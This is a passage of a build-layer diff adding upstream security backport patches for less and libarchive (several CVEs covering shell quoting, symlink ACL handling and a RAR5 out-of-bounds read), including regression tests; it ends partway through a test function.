+From c6ac6de49698be84d264a0c4c0c40bb870b10144 Mon Sep 17 00:00:00 2001
+From: Mark Nudelman <markn@greenwoodsoftware.com>
+Date: Sat, 25 Jun 2022 11:54:43 -0700
+Subject: [PATCH] Shell-quote filenames when invoking LESSCLOSE.
+
+Upstream-Status: Backport [https://github.com/gwsw/less/commit/c6ac6de49698be84d264a0c4c0c40bb870b10144]
+CVE: CVE-2022-48624
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ filename.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/filename.c b/filename.c
+index 5824e385..dff20c08 100644
+--- a/filename.c
++++ b/filename.c
+@@ -972,6 +972,8 @@ close_altfile(altfilename, filename)
+ {
+ #if HAVE_POPEN
+ 	char *lessclose;
++	char *qfilename;
++	char *qaltfilename;
+ 	FILE *fd;
+ 	char *cmd;
+ 	int len;
+@@ -986,9 +988,13 @@ close_altfile(altfilename, filename)
+ 		error("LESSCLOSE ignored; must contain no more than 2 %%s", NULL_PARG);
+ 		return;
+ 	}
+-	len = (int) (strlen(lessclose) + strlen(filename) + strlen(altfilename) + 2);
++	qfilename = shell_quote(filename);
++	qaltfilename = shell_quote(altfilename);
++	len = (int) (strlen(lessclose) + strlen(qfilename) + strlen(qaltfilename) + 2);
+ 	cmd = (char *) ecalloc(len, sizeof(char));
+-	SNPRINTF2(cmd, len, lessclose, filename, altfilename);
++	SNPRINTF2(cmd, len, lessclose, qfilename, qaltfilename);
++	free(qaltfilename);
++	free(qfilename);
+ 	fd = shellcmd(cmd);
+ 	free(cmd);
+ 	if (fd != NULL)
diff --git a/meta/recipes-extended/less/less_551.bb b/meta/recipes-extended/less/less_551.bb
index a818c68fc7..401f40bed5 100644
--- a/meta/recipes-extended/less/less_551.bb
+++ b/meta/recipes-extended/less/less_551.bb
@@ -26,6 +26,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504 \
 DEPENDS = "ncurses"
 
 SRC_URI = "http://www.greenwoodsoftware.com/${BPN}/${BPN}-${PV}.tar.gz \
+           file://CVE-2022-48624.patch \
 	  "
 
 SRC_URI[md5sum] = "4ad4408b06d7a6626a055cb453f36819"
diff --git a/meta/recipes-extended/libaio/libaio_0.3.111.bb b/meta/recipes-extended/libaio/libaio_0.3.111.bb
index 8e1cd349a0..309ae53bfb 100644
--- a/meta/recipes-extended/libaio/libaio_0.3.111.bb
+++ b/meta/recipes-extended/libaio/libaio_0.3.111.bb
@@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html"
 LICENSE = "LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499"
 
-SRC_URI = "git://pagure.io/libaio.git;protocol=https \
+SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \
            file://00_arches.patch \
            file://destdir.patch \
            file://libaio_fix_for_mips_syscalls.patch \
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch
new file mode 100644
index 0000000000..555c7a47f7
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-23177.patch
@@ -0,0 +1,183 @@
+Description: Fix handling of symbolic link ACLs
+ Published as CVE-2021-23177
+Origin: upstream, https://github.com/libarchive/libarchive/commit/fba4f123cc456d2b2538f811bb831483bf336bad
+Bug-Debian: https://bugs.debian.org/1001986
+Author: Martin Matuska <martin@matuska.org>
+Last-Updated: 2021-12-20
+
+CVE: CVE-2021-23177
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/libarchive/archive_disk_acl_freebsd.c
++++ b/libarchive/archive_disk_acl_freebsd.c
+@@ -319,7 +319,7 @@
+ 
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+-    struct archive_acl *abstract_acl,
++    struct archive_acl *abstract_acl, __LA_MODE_T mode,
+     int ae_requested_type, const char *tname)
+ {
+ 	int		 acl_type = 0;
+@@ -364,6 +364,13 @@
+ 		return (ARCHIVE_FAILED);
+ 	}
+ 
++	if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) {
++		errno = EINVAL;
++		archive_set_error(a, errno,
++		    "Cannot set default ACL on non-directory");
++		return (ARCHIVE_WARN);
++	}
++
+ 	acl = acl_init(entries);
+ 	if (acl == (acl_t)NULL) {
+ 		archive_set_error(a, errno,
+@@ -542,7 +549,10 @@
+ 	else if (acl_set_link_np(name, acl_type, acl) != 0)
+ #else
+ 	/* FreeBSD older than 8.0 */
+-	else if (acl_set_file(name, acl_type, acl) != 0)
++	else if (S_ISLNK(mode)) {
++	    /* acl_set_file() follows symbolic links, skip */
++	    ret = ARCHIVE_OK;
++	} else if (acl_set_file(name, acl_type, acl) != 0)
+ #endif
+ 	{
+ 		if (errno == EOPNOTSUPP) {
+@@ -677,14 +687,14 @@
+ 	    & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ 		if ((archive_acl_types(abstract_acl)
+ 		    & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
+-			ret = set_acl(a, fd, name, abstract_acl,
++			ret = set_acl(a, fd, name, abstract_acl, mode,
+ 			    ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access");
+ 			if (ret != ARCHIVE_OK)
+ 				return (ret);
+ 		}
+ 		if ((archive_acl_types(abstract_acl)
+ 		    & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0)
+-			ret = set_acl(a, fd, name, abstract_acl,
++			ret = set_acl(a, fd, name, abstract_acl, mode,
+ 			    ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default");
+ 
+ 		/* Simultaneous POSIX.1e and NFSv4 is not supported */
+@@ -693,7 +703,7 @@
+ #if ARCHIVE_ACL_FREEBSD_NFS4
+ 	else if ((archive_acl_types(abstract_acl) &
+ 	    ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) {
+-		ret = set_acl(a, fd, name, abstract_acl,
++		ret = set_acl(a, fd, name, abstract_acl, mode,
+ 		    ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4");
+ 	}
+ #endif
+--- a/libarchive/archive_disk_acl_linux.c
++++ b/libarchive/archive_disk_acl_linux.c
+@@ -343,6 +343,11 @@
+ 		return (ARCHIVE_FAILED);
+ 	}
+ 
++	if (S_ISLNK(mode)) {
++		/* Linux does not support RichACLs on symbolic links */
++		return (ARCHIVE_OK);
++	}
++
+ 	richacl = richacl_alloc(entries);
+ 	if (richacl == NULL) {
+ 		archive_set_error(a, errno,
+@@ -455,7 +460,7 @@
+ #if ARCHIVE_ACL_LIBACL
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+-    struct archive_acl *abstract_acl,
++    struct archive_acl *abstract_acl, __LA_MODE_T mode,
+     int ae_requested_type, const char *tname)
+ {
+ 	int		 acl_type = 0;
+@@ -488,6 +493,18 @@
+ 		return (ARCHIVE_FAILED);
+ 	}
+ 
++	if (S_ISLNK(mode)) {
++		/* Linux does not support ACLs on symbolic links */
++		return (ARCHIVE_OK);
++	}
++
++	if (acl_type == ACL_TYPE_DEFAULT && !S_ISDIR(mode)) {
++		errno = EINVAL;
++		archive_set_error(a, errno,
++		    "Cannot set default ACL on non-directory");
++		return (ARCHIVE_WARN);
++	}
++
+ 	acl = acl_init(entries);
+ 	if (acl == (acl_t)NULL) {
+ 		archive_set_error(a, errno,
+@@ -727,14 +744,14 @@
+ 	    & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ 		if ((archive_acl_types(abstract_acl)
+ 		    & ARCHIVE_ENTRY_ACL_TYPE_ACCESS) != 0) {
+-			ret = set_acl(a, fd, name, abstract_acl,
++			ret = set_acl(a, fd, name, abstract_acl, mode,
+ 			    ARCHIVE_ENTRY_ACL_TYPE_ACCESS, "access");
+ 			if (ret != ARCHIVE_OK)
+ 				return (ret);
+ 		}
+ 		if ((archive_acl_types(abstract_acl)
+ 		    & ARCHIVE_ENTRY_ACL_TYPE_DEFAULT) != 0)
+-			ret = set_acl(a, fd, name, abstract_acl,
++			ret = set_acl(a, fd, name, abstract_acl, mode,
+ 			    ARCHIVE_ENTRY_ACL_TYPE_DEFAULT, "default");
+ 	}
+ #endif	/* ARCHIVE_ACL_LIBACL */
+--- a/libarchive/archive_disk_acl_sunos.c
++++ b/libarchive/archive_disk_acl_sunos.c
+@@ -443,7 +443,7 @@
+ 
+ static int
+ set_acl(struct archive *a, int fd, const char *name,
+-    struct archive_acl *abstract_acl,
++    struct archive_acl *abstract_acl, __LA_MODE_T mode,
+     int ae_requested_type, const char *tname)
+ {
+ 	aclent_t	 *aclent;
+@@ -467,7 +467,6 @@
+ 	if (entries == 0)
+ 		return (ARCHIVE_OK);
+ 
+-
+ 	switch (ae_requested_type) {
+ 	case ARCHIVE_ENTRY_ACL_TYPE_POSIX1E:
+ 		cmd = SETACL;
+@@ -492,6 +491,12 @@
+ 		return (ARCHIVE_FAILED);
+ 	}
+ 
++        if (S_ISLNK(mode)) {
++                /* Skip ACLs on symbolic links */
++		ret = ARCHIVE_OK;
++		goto exit_free;
++        }
++
+ 	e = 0;
+ 
+ 	while (archive_acl_next(a, abstract_acl, ae_requested_type, &ae_type,
+@@ -801,7 +806,7 @@
+ 	if ((archive_acl_types(abstract_acl)
+ 	    & ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+ 		/* Solaris writes POSIX.1e access and default ACLs together */
+-		ret = set_acl(a, fd, name, abstract_acl,
++		ret = set_acl(a, fd, name, abstract_acl, mode,
+ 		    ARCHIVE_ENTRY_ACL_TYPE_POSIX1E, "posix1e");
+ 
+ 		/* Simultaneous POSIX.1e and NFSv4 is not supported */
+@@ -810,7 +815,7 @@
+ #if ARCHIVE_ACL_SUNOS_NFS4
+ 	else if ((archive_acl_types(abstract_acl) &
+ 	    ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) {
+-		ret = set_acl(a, fd, name, abstract_acl,
++		ret = set_acl(a, fd, name, abstract_acl, mode,
+ 		    ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4");
+ 	}
+ #endif
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch
new file mode 100644
index 0000000000..c4a2fb612c
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch
@@ -0,0 +1,23 @@
+Description: Never follow symlinks when setting file flags on Linux
+ Published as CVE-2021-31566
+Origin: upstream, https://github.com/libarchive/libarchive/commit/e2ad1a2c3064fa9eba6274b3641c4c1beed25c0b
+Bug-Debian: https://bugs.debian.org/1001990
+Author: Martin Matuska <martin@matuska.org>
+Last-Update: 2021-12-20
+
+CVE: CVE-2021-31566
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/libarchive/archive_write_disk_posix.c
++++ b/libarchive/archive_write_disk_posix.c
+@@ -3927,7 +3927,8 @@
+ 
+ 	/* If we weren't given an fd, open it ourselves. */
+ 	if (myfd < 0) {
+-		myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY | O_CLOEXEC);
++		myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY |
++		    O_CLOEXEC | O_NOFOLLOW);
+ 		__archive_ensure_cloexec_flag(myfd);
+ 	}
+ 	if (myfd < 0)
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch
new file mode 100644
index 0000000000..0dfcd1ac5c
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch
@@ -0,0 +1,172 @@
+Description: Do not follow symlinks when processing the fixup list
+ Published as CVE-2021-31566
+Origin: upstream, https://github.com/libarchive/libarchive/commit/b41daecb5ccb4c8e3b2c53fd6147109fc12c3043
+Bug-Debian: https://bugs.debian.org/1001990
+Author: Martin Matuska <martin@matuska.org>
+Last-Update: 2021-12-20
+
+CVE: CVE-2021-31566
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -556,6 +556,7 @@
+ 	libarchive/test/test_write_disk.c \
+ 	libarchive/test/test_write_disk_appledouble.c \
+ 	libarchive/test/test_write_disk_failures.c \
++	libarchive/test/test_write_disk_fixup.c \
+ 	libarchive/test/test_write_disk_hardlink.c \
+ 	libarchive/test/test_write_disk_hfs_compression.c \
+ 	libarchive/test/test_write_disk_lookup.c \
+--- a/libarchive/archive_write_disk_posix.c
++++ b/libarchive/archive_write_disk_posix.c
+@@ -2461,6 +2461,7 @@
+ {
+ 	struct archive_write_disk *a = (struct archive_write_disk *)_a;
+ 	struct fixup_entry *next, *p;
++	struct stat st;
+ 	int fd, ret;
+ 
+ 	archive_check_magic(&a->archive, ARCHIVE_WRITE_DISK_MAGIC,
+@@ -2478,6 +2479,20 @@
+ 		    (TODO_TIMES | TODO_MODE_BASE | TODO_ACLS | TODO_FFLAGS)) {
+ 			fd = open(p->name,
+ 			    O_WRONLY | O_BINARY | O_NOFOLLOW | O_CLOEXEC);
++			if (fd == -1) {
++				/* If we cannot lstat, skip entry */
++				if (lstat(p->name, &st) != 0)
++					goto skip_fixup_entry;
++				/*
++				 * If we deal with a symbolic link, mark
++				 * it in the fixup mode to ensure no
++				 * modifications are made to its target.
++				 */
++				if (S_ISLNK(st.st_mode)) {
++					p->mode &= ~S_IFMT;
++					p->mode |= S_IFLNK;
++				}
++			}
+ 		}
+ 		if (p->fixup & TODO_TIMES) {
+ 			set_times(a, fd, p->mode, p->name,
+@@ -2492,7 +2507,12 @@
+ 				fchmod(fd, p->mode);
+ 			else
+ #endif
+-			chmod(p->name, p->mode);
++#ifdef HAVE_LCHMOD
++			lchmod(p->name, p->mode);
++#else
++			if (!S_ISLNK(p->mode))
++				chmod(p->name, p->mode);
++#endif
+ 		}
+ 		if (p->fixup & TODO_ACLS)
+ 			archive_write_disk_set_acls(&a->archive, fd,
+@@ -2503,6 +2523,7 @@
+ 		if (p->fixup & TODO_MAC_METADATA)
+ 			set_mac_metadata(a, p->name, p->mac_metadata,
+ 					 p->mac_metadata_size);
++skip_fixup_entry:
+ 		next = p->next;
+ 		archive_acl_clear(&p->acl);
+ 		free(p->mac_metadata);
+@@ -2643,6 +2664,7 @@
+ 	fe->next = a->fixup_list;
+ 	a->fixup_list = fe;
+ 	fe->fixup = 0;
++	fe->mode = 0;
+ 	fe->name = strdup(pathname);
+ 	return (fe);
+ }
+--- a/libarchive/test/CMakeLists.txt
++++ b/libarchive/test/CMakeLists.txt
+@@ -208,6 +208,7 @@
+     test_write_disk.c
+     test_write_disk_appledouble.c
+     test_write_disk_failures.c
++    test_write_disk_fixup.c
+     test_write_disk_hardlink.c
+     test_write_disk_hfs_compression.c
+     test_write_disk_lookup.c
+--- /dev/null
++++ b/libarchive/test/test_write_disk_fixup.c
+@@ -0,0 +1,77 @@
++/*-
++ * Copyright (c) 2021 Martin Matuska
++ * All rights reserved.
++ *
++ * Redistribution and use in source and binary forms, with or without
++ * modification, are permitted provided that the following conditions
++ * are met:
++ * 1. Redistributions of source code must retain the above copyright
++ *    notice, this list of conditions and the following disclaimer.
++ * 2. Redistributions in binary form must reproduce the above copyright
++ *    notice, this list of conditions and the following disclaimer in the
++ *    documentation and/or other materials provided with the distribution.
++ *
++ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR(S) ``AS IS'' AND ANY EXPRESS OR
++ * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
++ * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
++ * IN NO EVENT SHALL THE AUTHOR(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
++ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
++ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
++ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
++ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
++ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
++ * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
++ */
++#include "test.h"
++
++/*
++ * Test fixup entries don't follow symlinks
++ */
++DEFINE_TEST(test_write_disk_fixup)
++{
++	struct archive *ad;
++	struct archive_entry *ae;
++	int r;
++
++	if (!canSymlink()) {
++		skipping("Symlinks not supported");
++		return;
++	}
++
++	/* Write entries to disk. */
++	assert((ad = archive_write_disk_new()) != NULL);
++
++	/*
++	 * Create a file
++	 */
++	assertMakeFile("victim", 0600, "a");
++
++	/*
++	 * Create a directory and a symlink with the same name
++	 */
++
++	/* Directory: dir */
++        assert((ae = archive_entry_new()) != NULL);
++        archive_entry_copy_pathname(ae, "dir");
++        archive_entry_set_mode(ae, AE_IFDIR | 0606);
++	assertEqualIntA(ad, 0, archive_write_header(ad, ae));
++	assertEqualIntA(ad, 0, archive_write_finish_entry(ad));
++        archive_entry_free(ae);
++
++	/* Symbolic Link: dir -> foo */
++	assert((ae = archive_entry_new()) != NULL);
++	archive_entry_copy_pathname(ae, "dir");
++	archive_entry_set_mode(ae, AE_IFLNK | 0777);
++	archive_entry_set_size(ae, 0);
++	archive_entry_copy_symlink(ae, "victim");
++	assertEqualIntA(ad, 0, r = archive_write_header(ad, ae));
++	if (r >= ARCHIVE_WARN)
++		assertEqualIntA(ad, 0, archive_write_finish_entry(ad));
++	archive_entry_free(ae);
++
++	assertEqualInt(ARCHIVE_OK, archive_write_free(ad));
++
++	/* Test the entries on disk. */
++	assertIsSymlink("dir", "victim", 0);
++	assertFileMode("victim", 0600);
++}
diff --git a/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
new file mode 100644
index 0000000000..fca53fc9b6
--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
@@ -0,0 +1,321 @@
+From 05ebb55896d10a9737dad9ae0303f7f45489ba6f Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Sat, 13 Feb 2021 09:08:13 +0100
+Subject: [PATCH] RAR5 reader: fixed out of bounds read in some files
+
+Added more range checks in the bit stream reading functions
+(read_bits_16 and read_bits_32) in order to better guard against out of
+memory reads.
+
+This commit contains a test with OSSFuzz sample #30448.
+
+Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-1.patch?h=applied/3.4.3-2ubuntu0.1]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+---
+ Makefile.am                                   |   1 +
+ libarchive/archive_read_support_format_rar5.c | 108 ++++++++++--------
+ libarchive/test/test_read_format_rar5.c       |  16 +++
+ ...r5_decode_number_out_of_bounds_read.rar.uu |  10 ++
+ 4 files changed, 89 insertions(+), 46 deletions(-)
+ create mode 100644 libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -883,6 +883,7 @@ libarchive_test_EXTRA_DIST=\
+ 	libarchive/test/test_read_format_rar5_arm_filter_on_window_boundary.rar.uu \
+ 	libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
+ 	libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
++	libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
+ 	libarchive/test/test_read_format_raw.bufr.uu \
+ 	libarchive/test/test_read_format_raw.data.gz.uu \
+ 	libarchive/test/test_read_format_raw.data.Z.uu \
+--- a/libarchive/archive_read_support_format_rar5.c
++++ b/libarchive/archive_read_support_format_rar5.c
+@@ -1012,7 +1012,16 @@ static int read_var_sized(struct archive
+ 	return ret;
+ }
+ 
+-static int read_bits_32(struct rar5* rar, const uint8_t* p, uint32_t* value) {
++static int read_bits_32(struct archive_read* a, struct rar5* rar,
++	const uint8_t* p, uint32_t* value)
++{
++	if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
++		archive_set_error(&a->archive,
++			ARCHIVE_ERRNO_PROGRAMMER,
++			"Premature end of stream during extraction of data (#1)");
++		return ARCHIVE_FATAL;
++	}
++
+ 	uint32_t bits = ((uint32_t) p[rar->bits.in_addr]) << 24;
+ 	bits |= p[rar->bits.in_addr + 1] << 16;
+ 	bits |= p[rar->bits.in_addr + 2] << 8;
+@@ -1023,7 +1032,16 @@ static int read_bits_32(struct rar5* rar
+ 	return ARCHIVE_OK;
+ }
+ 
+-static int read_bits_16(struct rar5* rar, const uint8_t* p, uint16_t* value) {
++static int read_bits_16(struct archive_read* a, struct rar5* rar,
++	const uint8_t* p, uint16_t* value)
++{
++	if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
++		archive_set_error(&a->archive,
++			ARCHIVE_ERRNO_PROGRAMMER,
++			"Premature end of stream during extraction of data (#2)");
++		return ARCHIVE_FATAL;
++	}
++
+ 	int bits = (int) ((uint32_t) p[rar->bits.in_addr]) << 16;
+ 	bits |= (int) p[rar->bits.in_addr + 1] << 8;
+ 	bits |= (int) p[rar->bits.in_addr + 2];
+@@ -1039,8 +1057,8 @@ static void skip_bits(struct rar5* rar,
+ }
+ 
+ /* n = up to 16 */
+-static int read_consume_bits(struct rar5* rar, const uint8_t* p, int n,
+-    int* value)
++static int read_consume_bits(struct archive_read* a, struct rar5* rar,
++	const uint8_t* p, int n, int* value)
+ {
+ 	uint16_t v;
+ 	int ret, num;
+@@ -1051,7 +1069,7 @@ static int read_consume_bits(struct rar5
+ 		return ARCHIVE_FATAL;
+ 	}
+ 
+-	ret = read_bits_16(rar, p, &v);
++	ret = read_bits_16(a, rar, p, &v);
+ 	if(ret != ARCHIVE_OK)
+ 		return ret;
+ 
+@@ -2425,13 +2443,13 @@ static int create_decode_tables(uint8_t*
+ static int decode_number(struct archive_read* a, struct decode_table* table,
+     const uint8_t* p, uint16_t* num)
+ {
+-	int i, bits, dist;
++	int i, bits, dist, ret;
+ 	uint16_t bitfield;
+ 	uint32_t pos;
+ 	struct rar5* rar = get_context(a);
+ 
+-	if(ARCHIVE_OK != read_bits_16(rar, p, &bitfield)) {
+-		return ARCHIVE_EOF;
++	if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &bitfield))) {
++		return ret;
+ 	}
+ 
+ 	bitfield &= 0xfffe;
+@@ -2537,14 +2555,6 @@ static int parse_tables(struct archive_r
+ 	for(i = 0; i < HUFF_TABLE_SIZE;) {
+ 		uint16_t num;
+ 
+-		if((rar->bits.in_addr + 6) >= rar->cstate.cur_block_size) {
+-			/* Truncated data, can't continue. */
+-			archive_set_error(&a->archive,
+-			    ARCHIVE_ERRNO_FILE_FORMAT,
+-			    "Truncated data in huffman tables (#2)");
+-			return ARCHIVE_FATAL;
+-		}
+-
+ 		ret = decode_number(a, &rar->cstate.bd, p, &num);
+ 		if(ret != ARCHIVE_OK) {
+ 			archive_set_error(&a->archive,
+@@ -2561,8 +2571,8 @@ static int parse_tables(struct archive_r
+ 			/* 16..17: repeat previous code */
+ 			uint16_t n;
+ 
+-			if(ARCHIVE_OK != read_bits_16(rar, p, &n))
+-				return ARCHIVE_EOF;
++			if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
++				return ret;
+ 
+ 			if(num == 16) {
+ 				n >>= 13;
+@@ -2590,8 +2600,8 @@ static int parse_tables(struct archive_r
+ 			/* other codes: fill with zeroes `n` times */
+ 			uint16_t n;
+ 
+-			if(ARCHIVE_OK != read_bits_16(rar, p, &n))
+-				return ARCHIVE_EOF;
++			if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
++				return ret;
+ 
+ 			if(num == 18) {
+ 				n >>= 13;
+@@ -2707,22 +2717,22 @@ static int parse_block_header(struct arc
+ }
+ 
+ /* Convenience function used during filter processing. */
+-static int parse_filter_data(struct rar5* rar, const uint8_t* p,
+-    uint32_t* filter_data)
++static int parse_filter_data(struct archive_read* a, struct rar5* rar,
++	const uint8_t* p, uint32_t* filter_data)
+ {
+-	int i, bytes;
++	int i, bytes, ret;
+ 	uint32_t data = 0;
+ 
+-	if(ARCHIVE_OK != read_consume_bits(rar, p, 2, &bytes))
+-		return ARCHIVE_EOF;
++	if(ARCHIVE_OK != (ret = read_consume_bits(a, rar, p, 2, &bytes)))
++		return ret;
+ 
+ 	bytes++;
+ 
+ 	for(i = 0; i < bytes; i++) {
+ 		uint16_t byte;
+ 
+-		if(ARCHIVE_OK != read_bits_16(rar, p, &byte)) {
+-			return ARCHIVE_EOF;
++		if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &byte))) {
++			return ret;
+ 		}
+ 
+ 		/* Cast to uint32_t will ensure the shift operation will not
+@@ -2765,16 +2775,17 @@ static int parse_filter(struct archive_r
+ 	uint16_t filter_type;
+ 	struct filter_info* filt = NULL;
+ 	struct rar5* rar = get_context(ar);
++	int ret;
+ 
+ 	/* Read the parameters from the input stream. */
+-	if(ARCHIVE_OK != parse_filter_data(rar, p, &block_start))
+-		return ARCHIVE_EOF;
++	if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_start)))
++		return ret;
+ 
+-	if(ARCHIVE_OK != parse_filter_data(rar, p, &block_length))
+-		return ARCHIVE_EOF;
++	if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_length)))
++		return ret;
+ 
+-	if(ARCHIVE_OK != read_bits_16(rar, p, &filter_type))
+-		return ARCHIVE_EOF;
++	if(ARCHIVE_OK != (ret = read_bits_16(ar, rar, p, &filter_type)))
++		return ret;
+ 
+ 	filter_type >>= 13;
+ 	skip_bits(rar, 3);
+@@ -2814,8 +2825,8 @@ static int parse_filter(struct archive_r
+ 	if(filter_type == FILTER_DELTA) {
+ 		int channels;
+ 
+-		if(ARCHIVE_OK != read_consume_bits(rar, p, 5, &channels))
+-			return ARCHIVE_EOF;
++		if(ARCHIVE_OK != (ret = read_consume_bits(ar, rar, p, 5, &channels)))
++			return ret;
+ 
+ 		filt->channels = channels + 1;
+ 	}
+@@ -2823,10 +2834,11 @@ static int parse_filter(struct archive_r
+ 	return ARCHIVE_OK;
+ }
+ 
+-static int decode_code_length(struct rar5* rar, const uint8_t* p,
+-    uint16_t code)
++static int decode_code_length(struct archive_read* a, struct rar5* rar,
++	const uint8_t* p, uint16_t code)
+ {
+ 	int lbits, length = 2;
++
+ 	if(code < 8) {
+ 		lbits = 0;
+ 		length += code;
+@@ -2838,7 +2850,7 @@ static int decode_code_length(struct rar
+ 	if(lbits > 0) {
+ 		int add;
+ 
+-		if(ARCHIVE_OK != read_consume_bits(rar, p, lbits, &add))
++		if(ARCHIVE_OK != read_consume_bits(a, rar, p, lbits, &add))
+ 			return -1;
+ 
+ 		length += add;
+@@ -2933,7 +2945,7 @@ static int do_uncompress_block(struct ar
+ 			continue;
+ 		} else if(num >= 262) {
+ 			uint16_t dist_slot;
+-			int len = decode_code_length(rar, p, num - 262),
++			int len = decode_code_length(a, rar, p, num - 262),
+ 				dbits,
+ 				dist = 1;
+ 
+@@ -2975,12 +2987,12 @@ static int do_uncompress_block(struct ar
+ 					uint16_t low_dist;
+ 
+ 					if(dbits > 4) {
+-						if(ARCHIVE_OK != read_bits_32(
+-						    rar, p, &add)) {
++						if(ARCHIVE_OK != (ret = read_bits_32(
++						    a, rar, p, &add))) {
+ 							/* Return EOF if we
+ 							 * can't read more
+ 							 * data. */
+-							return ARCHIVE_EOF;
++							return ret;
+ 						}
+ 
+ 						skip_bits(rar, dbits - 4);
+@@ -3015,11 +3027,11 @@ static int do_uncompress_block(struct ar
+ 					/* dbits is one of [0,1,2,3] */
+ 					int add;
+ 
+-					if(ARCHIVE_OK != read_consume_bits(rar,
+-					     p, dbits, &add)) {
++					if(ARCHIVE_OK != (ret = read_consume_bits(a, rar,
++					     p, dbits, &add))) {
+ 						/* Return EOF if we can't read
+ 						 * more data. */
+-						return ARCHIVE_EOF;
++						return ret;
+ 					}
+ 
+ 					dist += add;
+@@ -3076,7 +3088,11 @@ static int do_uncompress_block(struct ar
+ 				return ARCHIVE_FATAL;
+ 			}
+ 
+-			len = decode_code_length(rar, p, len_slot);
++			len = decode_code_length(a, rar, p, len_slot);
++			if (len == -1) {
++				return ARCHIVE_FATAL;
++			}
++
+ 			rar->cstate.last_len = len;
+ 
+ 			if(ARCHIVE_OK != copy_string(a, len, dist))
+--- a/libarchive/test/test_read_format_rar5.c
++++ b/libarchive/test/test_read_format_rar5.c
+@@ -1271,3 +1271,20 @@ DEFINE_TEST(test_read_format_rar5_block_
+ 
+ 	EPILOGUE();
+ }
++
++DEFINE_TEST(test_read_format_rar5_decode_number_out_of_bounds_read)
++{
++	/* oss fuzz 30448 */
++
++	char buf[4096];
